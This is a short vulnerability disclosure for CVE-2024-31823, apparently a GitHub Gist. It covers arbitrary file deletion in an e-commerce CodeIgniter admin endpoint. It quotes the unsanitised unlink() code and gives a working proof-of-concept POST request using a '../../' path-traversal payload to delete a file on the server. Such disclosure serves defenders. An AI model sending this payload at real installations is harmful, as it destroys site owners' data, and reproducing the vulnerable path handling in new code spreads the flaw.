Skip to content

Instantly share code, notes, and snippets.

@LioTree
Created April 28, 2024 12:35
Show Gist options
  • Save LioTree/4989e0f20b6a885604dd3178fa4b66b5 to your computer and use it in GitHub Desktop.
Save LioTree/4989e0f20b6a885604dd3178fa4b66b5 to your computer and use it in GitHub Desktop.
CVE-2024-31823

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)

An arbitrary file deletion (CWE-73) vulnerability is in application/modules/admin/controllers/ecommerce/Publish.php. In the method removeSecondaryImage, the attacker can delete any file in the server by controlling $_POST['folder'] and $_POST['image'] after authorization.

public function removeSecondaryImage()
    {
        if ($this->input->is_ajax_request()) {
            $img = '.' . DIRECTORY_SEPARATOR . 'attachments' . DIRECTORY_SEPARATOR . 'shop_images' . DIRECTORY_SEPARATOR . '' . $_POST['folder'] . DIRECTORY_SEPARATOR . $_POST['image'];
            unlink($img);
        }
    }
POST /Ecommerce-CodeIgniter-Bootstrap/admin/removeSecondaryImage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/publish
Cookie: ci_session=8qfeq95l0u1nfjpj6clgr5p976m7igkh; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

image=README.md&folder=../../
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment